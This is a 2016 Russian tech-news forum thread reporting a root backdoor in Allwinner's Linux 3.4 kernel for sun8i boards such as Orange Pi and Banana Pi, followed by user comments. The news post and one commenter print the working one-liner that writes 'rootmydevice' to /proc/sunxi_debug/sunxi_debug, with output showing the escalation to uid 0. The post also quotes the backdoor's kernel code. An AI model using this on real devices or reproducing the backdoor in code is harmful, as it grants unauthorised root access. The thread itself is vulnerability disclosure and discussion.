URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID3
Нить номер: 107857
[ Назад ]

Исходное сообщение
"Бэкдор в отладочном коде модифицированного ядра Linux для си..."

Отправлено opennews , 10-Май-16 13:04 
Разработчики Linux-дистрибутива Armbian обратили внимание (http://forum.armbian.com/index.php/topic/1108-security-alert.../) на бэкдор, присутствующий в варианте ядра Linux, предлагаемом для устройств на базе процессоров Allwinner семейства sun8i (http://linux-sunxi.org) (H3, A83T и H8). Бэкдор позволяет получить привилегии root через запись строки "rootmydevice" в файл "/proc/sunxi_debug/sunxi_debug".


<font color="#461b7e">
   $ id
   uid=1000(user) gid=1000(user)

   $ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug

   $ id
   uid=0(root) gid=0(root)

</font>


Проблеме подвержены дистрибутивы и прошивки, использующие предлагаемое компанией Allwinner ядро Linux 3.4, поставляемое в составе официального BSP для Android. Например, бэкдор присутствует во всех основанных на ядре 3.4 системных образах для плат с процессорами Allwinner  H3, A83T и H8, включая Orange Pi, FriendlyARM (https://github.com/friendlyarm/h3_lichee/issues/1), SinoVoip M2+ (https://github.com/BPI-SINOVOIP/BPI-M2P-bsp/issues/1) и M3 Banana Pi (https://github.com/BPI-SINOVOIP/BPI-M3-bsp/issues/10), Cubietruck (https://github.com/cubieboard/Cubietruck_Plus-kernel-source/...) и LinkSprite pcDuino8 Uno (https://github.com/pcduino/pcduino8-uno-kernel/issues/3).

Для предоставления прав root в обработчике sunxi_proc_su_write используется (https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/...) следующий код, выставляющий привилегии root текущему процессу:

<font color="#461b7e">
        if(!strncmp("rootmydevice",(char*)buf,12)){
        cred = (struct cred *)__task_cred(current);
        cred->uid = 0;
        cred->gid = 0;
        cred->suid = 0;
        cred->euid = 0;
        cred->euid = 0;
        cred->egid = 0;
        cred->fsuid = 0;
        cred->fsgid = 0;
        printk("now you are root\n");
    }
</font>

Бэкдор позиционируется как отладочный режим, упрощающий получение прав root на портативных устройствах на базе платформы Android. В настоящее время уже подготовлен (https://github.com/friendlyarm/h3_lichee/commit/5d4d02b1c8f3...) патч, переводящий бэкдор в форму отключенной по умолчанию опции. Проблема уже устранена в выпуске дистрибутива  Armbian 5.10 (http://www.armbian.com/).

URL: http://www.theregister.co.uk/2016/05/09/allwinners_allloser_.../
Новость: http://www.opennet.me/opennews/art.shtml?num=44395


Содержание

Сообщения в этом обсуждении
"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 13:04 
отладочный режим для АНБ ФСБ КГБ

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 13:11 
короче для всех кроме нас)

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 15:26 
А вы, надо полагать, ЦРУ?

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 16:17 
Нет, ми моссад.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Fantomas , 11-Май-16 04:46 
Московский сад что ли?

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено t28 , 11-Май-16 09:22 
Да.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 23:23 
>  короче для всех кроме нас)

А у тебя что, echo не работает?


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 15:51 
ru.wikipedia.org
Совет по национальной безопасности (United States National Security Council) — совещательный и координирующий орган при Президенте США.
Национальный совет по контрразведке (National Counterintelligence Board).
Министерство национальной безопасности США.
Центральное разведывательное управление.
Агентство национальной безопасности (США).
Федеральное бюро расследований.
Разведывательное управление министерства обороны США.
Секретная служба США.
Национальное управление военно-космической разведки США.
Бюро разведки и исследований государственного департамента.
и другие (всего 16).
Так же к спецслужбам относятся и другие службы
Агентство по перспективным оборонным научно-исследовательским разработкам США.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 17:45 
Очень полезная функция на андроиде. Или получение рута через недокументированные "уязвимости" путем запуска подозрительных бинарей лучше?

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Eklykti , 10-Май-16 19:37 
Угу, только ты ставишь «калькулятор» из маркета, а он получает таким образом рута и ставит тебе уже настоящий бэкдор.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Crazy Alex , 10-Май-16 20:20 
Если ты хочешь безопасность на андроиде - какой, к лешему, маркет? Опять же - в принципе можно и бинарный патч наложить после этого. Хотя бы просто строку покорёжить.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено РОСКОМУЗОР , 10-Май-16 21:10 
Если ты хочешь безопасность, какой к лешему андроид?

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено God , 10-Май-16 21:38 
Если ты хочешь, то какая к лешему безопасность?

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Crazy Alex , 10-Май-16 21:48 
Самый обычный. Если не надо прятаться от спецслужб и прочих врагов, а всего лишь хочется не иметь вирусни - f-droid вместо непонятного софта из маркета и всё будет в порядке.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено vitalif , 10-Май-16 21:49 
Не, на андроиде маст хэв!

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 13:42 
Это не баг, это фича!

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено бедный буратино , 10-Май-16 14:01 
пойду свой armbian проверю

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 23:25 
> пойду свой armbian проверю

Не надо всякие бэкдорианы ставить и вендорские ядра. Только майнлайн, только дебиан, только хардкор.


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним as anon , 10-Май-16 14:35 
К андроиду данная новость не имеет никакого отношения. Если ни разу не видели что такое банана-пи и прочие линуксовые SOC, то просто переводите исходник новости без собственных пубертатных фантазий.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено p5n , 10-Май-16 14:51 
Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно не с ангстрём линуксом.

А вообще было бы здорово, если бы все производители BSP для мобильных чипов так делали. А то зарутовать телефон - целая проблема.


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 17:47 
> Например cubieboard идёт с прошитым андроидом. И есть планшеты на allwinner естественно
> не с ангстрём линуксом.
> А вообще было бы здорово, если бы все производители BSP для мобильных
> чипов так делали. А то зарутовать телефон - целая проблема.

Только надо пароль рута потом сразу создавать, т е это должно сразу предлагаться в шелл при первм юзе, а потом отключать дырку.


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 23:26 
> Например cubieboard идёт с прошитым андроидом.

У SD-карты приоритет. А у некоторых allwinner вообще только загрузка с карты и есть.


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 14:48 
Может стоит написать в новости кто же этот герой, добавивший бэкдор?

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено p5n , 10-Май-16 14:52 
> Может стоит написать в новости кто же этот герой, добавивший бэкдор?

Врядли компания Allwinner это расскажет. Речь о их форке ядра.


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 16:54 
$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
-bash: /proc/sunxi_debug/sunxi_debug: No such file or directory
$ uname -a
Linux evo 3.4.79-sunxi #2 SMP PREEMPT Sun Jul 13 20:36:39 EEST 2014 armv7l GNU/Linux

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 16:56 
а, там только для арм8. посыпаю голову пеплом :}

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено anonymous , 10-Май-16 18:25 
sun8i - это armv7

orangepi@OrangePI:~$ uname -a
Linux OrangePI 3.4.39 #2 SMP PREEMPT Mon Oct 12 12:03:03 CEST 2015 armv7l GNU/Linux
orangepi@OrangePI:~$ id
uid=1000(orangepi) gid=1000(orangepi) groups=1000(orangepi),27(sudo)
orangepi@OrangePI:~$ echo "rootmydevice" > /proc/sunxi_debug/sunxi_debug
orangepi@OrangePI:~$ id
uid=0(root) gid=0(root) groups=0(root),27(sudo),1000(orangepi)


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 17:06 
тот самый случай, когда proc не в прок

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 23:28 
> тот самый случай, когда proc не в прок

Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено в системе?


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 11-Май-16 23:38 
>> тот самый случай, когда proc не в прок
> Отключи. Только как ты потом будешь смотреть что у тебя вообще запущено
> в системе?

Ныхрены это смотреть на _отлаженной_ системе?


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено anonimus , 10-Май-16 18:27 
Строка `cred->euid = 0;` написана 2 раза

Надо челу, рекламирующиему статический анализатор с блюющим единорогом, проверить алвинеровские бекдоры и запилить статью на хабр с объяснениями как испраить баги и ссылкой на англоязычный перевод.


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено тоже Аноним , 10-Май-16 18:35 
Если их статический анализатор начнет еще и бэкдоры выявлять, имиджевому единорогу придется не только блевать радугой, но и какать бабочками.
Но пока, насколько мне известно, ему это не грозит.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено anonimus , 10-Май-16 18:44 
Не выявлять бекдоры, а хотя бы писать их так, чтобы они во время своей паразитной работы не гробили систему. Очень печально, когда подобная гадость портит тебе жизнь. Учитывая, что столько косяков в 10 строчках и учитывая, что код работает в режиме ядра, очень стремно становится от мысли, что же там творится в более сложном коде.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено anonimus , 10-Май-16 18:38 
да и код сравнения строк с strncmp написан неаккуратненько. Надо бы сначала убедиться что count >= 12 (еще лучше, просто == 12) и лишь затем вызывать  strncmp(..., 12)

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 19:25 
А смысл? Вернет значение больше нуля да и ладно

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено alex , 11-Май-16 17:37 
count - это типа сначала длину строки в буфере проверить?
дак сравнение точно также пройдётся по нему
проблема может возникнуть только если буфер меньше 12+1 байт и при этом в нём нет нулевого байта, но тогда и длину не получится определить корректно.

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено chinarulezzz , 10-Май-16 22:27 
> предлагаемое компанией Allwinner

к перцам нужно внимательней относиться)


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 10-Май-16 23:57 
>> предлагаемое компанией Allwinner
> к перцам нужно внимательней относиться)

У них там все драйверы такие. Где дебаг, где просто баг. Пользуйтесь майнлайном.


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено IZh. , 11-Май-16 11:56 
> cred->uid = 0;
> ...

А RCU для кого писано?
Вот тут точно статические анализаторы могли бы warning выдавать.


"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 11-Май-16 17:50 
Э "Бэкдор позиционируется как отладочный ре" типа уже позиционируется малварь легальный можно писать и грабить что ле?

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 11-Май-16 17:53 
такая спокойная беседа о бэкдоре

"Бэкдор в отладочном коде модифицированного ядра Linux для си..."
Отправлено Аноним , 11-Май-16 23:39 
> такая спокойная беседа о бэкдоре

Так они повсюду. Чтобы не понтоваться - надо выкинуть девайся и к староверам, в тайгу. А так, мыши, конечно, плакали, кололись - но фуле делать, социальность обезьяньего стада не истребить ничем! :)